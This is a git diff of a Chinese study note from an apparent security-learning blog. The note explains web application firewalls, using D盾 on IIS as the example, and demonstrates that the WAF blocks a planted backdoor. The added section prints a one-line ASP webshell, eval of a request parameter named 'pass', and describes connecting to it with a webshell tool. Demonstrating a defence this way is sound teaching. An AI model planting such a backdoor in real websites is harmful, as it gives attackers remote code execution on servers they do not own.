记录本体项目代码修改部分

--- a/docs/views/numerology/2025-01-01-CTFLearn.md
+++ b/docs/views/numerology/2025-01-01-CTFLearn.md
@@ -38,7 +38,7 @@ publish: true
 
 <!-- more -->
 
-# 第22章：Web架构&OSS存储&负载均衡&CDA加速&反向代理&WAF防护
+# 第22章：Web架构&OSS存储&负载均衡&CDN加速&反向代理&WAF防护
 
 ## 工具推荐：
 
@@ -50,14 +50,49 @@ AnyTXTSearcher：可以对电脑所有文本进行全文搜索，有时候记不
 
 ## WAF
 
+**全名：**` Web Application Firewall `，即 Web 应用防火墙
+
 **原理：**Web应用防火墙，旨在提供保护
 
 **影响：**常规Web安全测试
 
 **分类：**
 
-![1735820905471](/img/ctfLearn/1735820905471.png)
+![image-20250103202805760](/img/ctfLearn/image-20250103202805760.png)
 
 以前面三个最为常见，在公司产品中以硬件为主，个人使用以软件为主，还有云厂商提供WAF服务
 
-**举例：**Windows2012+IIS+D盾
+**举例：**只有免费例子Windows2012+IIS+D盾
+
+> [『D盾_防火墙』](https://www.d99net.net/)专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下，越少的功能，服务器越安全的理念而设计！ 限制了常见的入侵方法，让服务器更安全!
+
+![image-20250103192959876](/img/ctfLearn/image-20250103192959876.png)
+
+视频中演示的过程是在网站中做了个后门，具体是一个asp后门，内容为
+
+```asp
+<%eval request("pass")%>
+```
+
+**无WAF情况：**
+
+尝试在没有WAF的情况下访问网站，进入1.asp页面，发现是可以访问到的。
+
+然后用WebShell工具连接后门，连接密码是后门中的`pass`，看到是可以正常连接的。
+
+**开启WAF后：**
+
+也就是点击软件中的“安装D盾防护”，稍等即弹出安装成功。
+
+![image-20250103193815689](/img/ctfLearn/image-20250103193815689.png)
+
+此时访问页面时，会提示“禁止脚本的访问，如有疑问，请和管理员联系”。
+
+![image-20250103193746128](/img/ctfLearn/image-20250103193746128.png)
+
+用WebShell工具连接时，发现提示“初始化失败”，无法连接。
+
+**结论：**
+
+1. WAF是我们可以在服务器网站上的安全保护程序，类似我们电脑上的杀毒软件，开启对网站和服务器的保护。像D盾有非常多常规Web攻击手段的拦截，包括后门，可以在相应设置中开启。
+2. 在以后可能碰到有WAF防护的这种网站，有很多种类的WAF，而WAF绕过是钻空子的方法，只针对防护能力较差的WAF。大公司的WAF基本都绕过不了，能绕过的都基本是没有作用的绕过，没有什么意义。
